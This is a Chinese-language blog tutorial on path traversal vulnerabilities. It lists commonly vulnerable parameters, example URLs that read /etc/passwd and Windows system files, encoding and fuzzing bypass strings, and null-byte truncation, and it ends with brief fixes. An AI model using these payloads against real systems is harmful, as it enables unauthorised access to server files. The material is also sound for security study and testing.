• 路径穿越(Path Traversal)详解


    前言

    本文主要是对路径穿越漏洞进行学习总结,本身这个漏洞也并不常见,主要是多产生于php的程序。

    这种类型的攻击强制访问文件、目录、 以及位于 Web 文档根目录之外的命令 或 CGI 根目录。

    常用来其他读取、写入类漏洞结合。

    路径穿越漏洞的分类

    我个人给这种漏洞形成的原因可以分为两类
    错误配置

    由于带有中间代理转发性质的功能配置错误

    程序本身代码存在问题

    这一点十分好理解,就是代码写的有问题,逻辑简单,没有验证。

    漏洞容易出现的位置

    第一类:文件类参数

    请求参数似乎包含文件或目录名称的,例如include=main.inc或template=/en/sidebar。

    第二种:常见参数

    cat,dir,action,board,date,detail,file,download,path,folder,prefix

    include,page,inc,locate,show,doc,site,type,view,content,document

    layout,mod,conf

    第三种:域名根部

    根据推测这种应该是由于配置问题导致的。

    www.test.com/../../../../../../../../../../../etyc/passwd
    
    • 1

    攻击技巧

    通过…/ 到上一层目录

    这个是最基本,最常用的。

    绝对路径遍历

    以下 URL 可能容易受到此攻击:

    https://testsite/get.php?f=list 
    https://testsite/get.cgi?f=5 
    https://testsite/get.asp?f=test
    
    • 1
    • 2
    • 3

    攻击者可以像这样执行此攻击:

    https://testsite/get.php?f=/var/www/html/get.php 
    https://testsite/get.cgi?f=/var/www/html/admin/get.inc 
    https:// testsite/get.asp?f=/etc/passwd
    
    • 1
    • 2
    • 3

    当网络服务器返回有关网络应用程序错误的信息时,攻击者更容易猜测正确的位置(例如,带有源代码的文件的路径,然后可能会显示)。

    相对路径遍历

    相对路径遍历见的较多

    http://example.com/index.php?page=../../../etc/passwd
    
    • 1

    利用技巧

    权限探测

    如果可以读取以下文件,那么至少的管理员组的用户,当然前提是有administrator这个用户,没有的话,就要猜测用户了。

        c:/documents and settings/administrator/ntuser.ini
        c:/documents and settings/administrator/desktop/desktop.ini
        c:/users/administrator/desktop/desktop.ini
        c:/users/administrator/ntuser.ini
    
    • 1
    • 2
    • 3
    • 4

    如果可以读取以下文件,则读取文件的进程拥有LocalSystem权限;

        c:/system volume information/wpsettings.dat
        C:/Windows/CSC/v2.0.6/pq
        C:/Windows/CSC/v2.0.6/sm
        C:/$Recycle.Bin/S-1-5-18/desktop.ini
    
    • 1
    • 2
    • 3
    • 4

    关于LocalSystem:LocalSystem是预设的拥有本机所有权限的本地账户,这个账户跟通常的用户账户没有任何关联,也没有用户名和密码之类的凭证。这个服务账户可以打开注册表的HKEY_LOCAL_MACHINE\Security键,当LocalSystem访问网络资源时,它是作为计算机的域账户使用的。

    绕过

    16 位 Unicode 编码

    . = %u002e
    / = %u2215
    \ = %u2216
    
    • 1
    • 2
    • 3

    UTF-8编码

    . = %c0%2e, %e0%40%ae, %c0ae
    / = %c0%af, %e0%80%af, %c0%2f
    \ = %c0%5c, %c0%80%5c
    
    • 1
    • 2
    • 3

    UTF-7编码

    UTF-7(7 位 Unicode 转换格式)是一种可变长度字符编码,

    超长的 UTF-8 统一码编码

    .: %c0%2e, %e0%40%ae, %c0ae
    \: %c0%af, %e0%80%af, %c0%2f
    /: %c0%5c, %c0%80%5c
    
    • 1
    • 2
    • 3

    双层url编码

    . = %252e
    / = %252f
    \ = %255c
    
    • 1
    • 2
    • 3

    非常规组合
    “.”、“/”、“”,三个符号随意的组合多次(随机0-3次比较好感觉,因为看到的很多例子大概就是这样),进行绕过,如必要还可以添加其他符号进行尝试。下面是示例。也就是有点进行FUzz的意思

    ....//....//etc/passwd
    ..///....//etc/passwd
    /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
    ..././
    ...\.\
    ..;/
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6

    %00截断

    有些程序会在读取内容是添加指定后缀,使用%00可以进行截断,忽视后面的内容

    http://example.com/index.php?page=../../../etc/passwd%00

    PHP 修复了该问题 在版本 5.3.4 中。

    "?"截断

    跟上诉情况相同,在最后添加?也许同样会有效果

    修复

    1. 限制目录访问
    2. 检查用户输入

    参考

    https://code.google.com/archive/p/teenage-mutant-ninja-turtles/wikis/AdvancedObfuscationPathtraversal.wiki

  • 相关阅读:
    ZMQ之自杀的蜗牛模式和黑箱模式
    【数据库系统概论】实训(三)
    注解(Annotation)
    快速构建vue3 + vite项目
    Springcloud(一):springcloud使用nacos作为注册中心和配置中心
    【Windows】安装win10虚拟机
    SLAM从入门到精通(ROS网络通信)
    算法升级之路(三)
    破解小程序禁止使用JS解释器动态执行JS(eval5、estime、evil-eval等)代码的终极解决方案
    http与https的区别
  • 原文地址:https://blog.csdn.net/qingzhantianxia/article/details/128204437